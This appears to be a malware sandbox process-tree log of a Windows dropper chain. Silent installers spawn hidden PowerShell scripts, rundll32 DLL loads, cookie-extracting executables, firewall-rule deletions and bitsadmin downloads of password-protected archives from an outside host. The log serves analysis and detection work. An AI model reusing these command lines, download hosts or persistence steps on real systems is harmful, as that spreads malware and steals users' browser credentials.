C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vyzm0bxm.zkd\installer.exe /qn CAMPAIGN="654" & exit5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yqyss2ce.da2\Setup3310.exe /Verysilent /subid=623 & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\yqyss2ce.da2\Setup3310.exeC:\Users\Admin\AppData\Local\Temp\yqyss2ce.da2\Setup3310.exe /Verysilent /subid=6236⤵
-
C:\Users\Admin\AppData\Local\Temp\is-T7PVC.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-T7PVC.tmp\Setup3310.tmp" /SL5="$10474,138429,56832,C:\Users\Admin\AppData\Local\Temp\yqyss2ce.da2\Setup3310.exe" /Verysilent /subid=6237⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-5RQPJ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-5RQPJ.tmp\Setup.exe" /Verysilent8⤵
-
C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SMTP2.tmp\MediaBurner.tmp"C:\Users\Admin\AppData\Local\Temp\is-SMTP2.tmp\MediaBurner.tmp" /SL5="$3050A,303887,220160,C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QNCOS.tmp\_____________bob.exe"C:\Users\Admin\AppData\Local\Temp\is-QNCOS.tmp\_____________bob.exe" /S /UID=burnerch111⤵
- Drops file in Drivers directory
- Adds Run key to start application
-
C:\Program Files\Windows Security\ZVIOSTQMHV\ultramediaburner.exe"C:\Program Files\Windows Security\ZVIOSTQMHV\ultramediaburner.exe" /VERYSILENT12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CPU77.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-CPU77.tmp\ultramediaburner.tmp" /SL5="$30584,281924,62464,C:\Program Files\Windows Security\ZVIOSTQMHV\ultramediaburner.exe" /VERYSILENT13⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu14⤵
-
C:\Users\Admin\AppData\Local\Temp\96-cdcd3-65f-70b91-bf69ee21f36d9\Fikumigaena.exe"C:\Users\Admin\AppData\Local\Temp\96-cdcd3-65f-70b91-bf69ee21f36d9\Fikumigaena.exe"12⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\68-8b475-f52-2e1b1-5c4e2571c1280\Qomikaekuqy.exe"C:\Users\Admin\AppData\Local\Temp\68-8b475-f52-2e1b1-5c4e2571c1280\Qomikaekuqy.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\obhd0sxq.uj5\GcleanerEU.exe /eufive & exit13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3isgf5zv.5q2\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0abmzj35.vpe\Setup3310.exe /Verysilent /subid=623 & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\0abmzj35.vpe\Setup3310.exeC:\Users\Admin\AppData\Local\Temp\0abmzj35.vpe\Setup3310.exe /Verysilent /subid=62314⤵
-
C:\Users\Admin\AppData\Local\Temp\is-8USGP.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-8USGP.tmp\Setup3310.tmp" /SL5="$30440,138429,56832,C:\Users\Admin\AppData\Local\Temp\0abmzj35.vpe\Setup3310.exe" /Verysilent /subid=62315⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-74D8F.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-74D8F.tmp\Setup.exe" /Verysilent16⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exeC:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exe"C:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exe" -a15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exe14⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exe15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\14s4xsrx.0yo\SunLabsPlayer.exe /S & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\14s4xsrx.0yo\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\14s4xsrx.0yo\SunLabsPlayer.exe /S14⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z15⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx15⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx16⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\khjyxiaa.j3y\GcleanerWW.exe /mixone & exit13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zl0vlbkg.1ph\libravpn_setup.exe subid=685 /verysilent & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\zl0vlbkg.1ph\libravpn_setup.exeC:\Users\Admin\AppData\Local\Temp\zl0vlbkg.1ph\libravpn_setup.exe subid=685 /verysilent14⤵
-
C:\Users\Admin\AppData\Local\Temp\is-HA8LS.tmp\libravpn_setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-HA8LS.tmp\libravpn_setup.tmp" /SL5="$1095C,11382886,1080320,C:\Users\Admin\AppData\Local\Temp\zl0vlbkg.1ph\libravpn_setup.exe" subid=685 /verysilent15⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\LibraVPN\LibraVPN.exe"C:\Program Files (x86)\LibraVPN\LibraVPN.exe"16⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND17⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND18⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND19⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_APP_OUTBOUND17⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_APP_OUTBOUND18⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name=OVS_ALLOW_APP_OUTBOUND19⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_RESOLUTION_OUTBOUND17⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_RESOLUTION_OUTBOUND18⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_RESOLUTION_OUTBOUND19⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_OUTBOUND17⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV118⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_OUTBOUND18⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_OUTBOUND19⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_LOCAL_OUTBOUND17⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV118⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_LOCAL_OUTBOUND18⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name=OVS_ALLOW_LOCAL_OUTBOUND19⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND17⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND18⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND19⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall set allprofiles firewallpolicy BlockInbound,AllowOutbound17⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c netsh advfirewall set allprofiles firewallpolicy BlockInbound,AllowOutbound18⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles firewallpolicy BlockInbound,AllowOutbound19⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c chcp 65001 > nul & cmd.exe /c ipconfig /flushdns17⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c ipconfig /flushdns18⤵
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns19⤵
- Gathers network information
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im wireguard.exe17⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wireguard.exe18⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd.exe /c chcp 65001 > nul & cmd.exe /c netsh wlan show interfaces > openvpn\dat\tmp_check_WiFi.dat17⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6796 -s 169217⤵
- Program crash
-
C:\Program Files (x86)\Data Finder\Versium Research\app.exe"C:\Program Files (x86)\Data Finder\Versium Research\app.exe"9⤵
-
C:\Program Files (x86)\Data Finder\Versium Research\app.exe"C:\Program Files (x86)\Data Finder\Versium Research\app.exe"10⤵
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"9⤵
-
C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe" -a10⤵
-
C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QV5OL.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-QV5OL.tmp\LabPicV3.tmp" /SL5="$30566,506127,422400,C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-76I3R.tmp\12(((((.exe"C:\Users\Admin\AppData\Local\Temp\is-76I3R.tmp\12(((((.exe" /S /UID=lab21411⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Common Files\KLOTBEAUID\prolab.exe"C:\Program Files\Common Files\KLOTBEAUID\prolab.exe" /VERYSILENT12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QL72N.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-QL72N.tmp\prolab.tmp" /SL5="$505A4,575243,216576,C:\Program Files\Common Files\KLOTBEAUID\prolab.exe" /VERYSILENT13⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\79-01612-9df-7a4a7-34210b1edded5\Tuvuduloxa.exe"C:\Users\Admin\AppData\Local\Temp\79-01612-9df-7a4a7-34210b1edded5\Tuvuduloxa.exe"12⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\ff-9508d-e66-22aa0-f5366762714c6\Hyxixanicy.exe"C:\Users\Admin\AppData\Local\Temp\ff-9508d-e66-22aa0-f5366762714c6\Hyxixanicy.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cwmf3g4l.ika\GcleanerEU.exe /eufive & exit13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4undjfq4.0xu\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j5kvrutv.4k2\Setup3310.exe /Verysilent /subid=623 & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\j5kvrutv.4k2\Setup3310.exeC:\Users\Admin\AppData\Local\Temp\j5kvrutv.4k2\Setup3310.exe /Verysilent /subid=62314⤵
-
C:\Users\Admin\AppData\Local\Temp\is-POKCV.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-POKCV.tmp\Setup3310.tmp" /SL5="$20452,138429,56832,C:\Users\Admin\AppData\Local\Temp\j5kvrutv.4k2\Setup3310.exe" /Verysilent /subid=62315⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-J6D3D.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-J6D3D.tmp\Setup.exe" /Verysilent16⤵
- Drops file in Program Files directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exeC:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exe"C:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exe" -a15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exe14⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exe15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kybtrrnp.kvo\SunLabsPlayer.exe /S & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\kybtrrnp.kvo\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\kybtrrnp.kvo\SunLabsPlayer.exe /S14⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z15⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx15⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx16⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\50me53sj.iaw\GcleanerWW.exe /mixone & exit13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exe /8-2222 & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exeC:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exe /8-222214⤵
-
C:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exe"C:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exe" /8-222215⤵
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QV5OK.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-QV5OK.tmp\lylal220.tmp" /SL5="$20590,172303,88576,C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-O8109.tmp\èeèrgegdè_éçè_)))_.exe"C:\Users\Admin\AppData\Local\Temp\is-O8109.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=lylal22011⤵
-
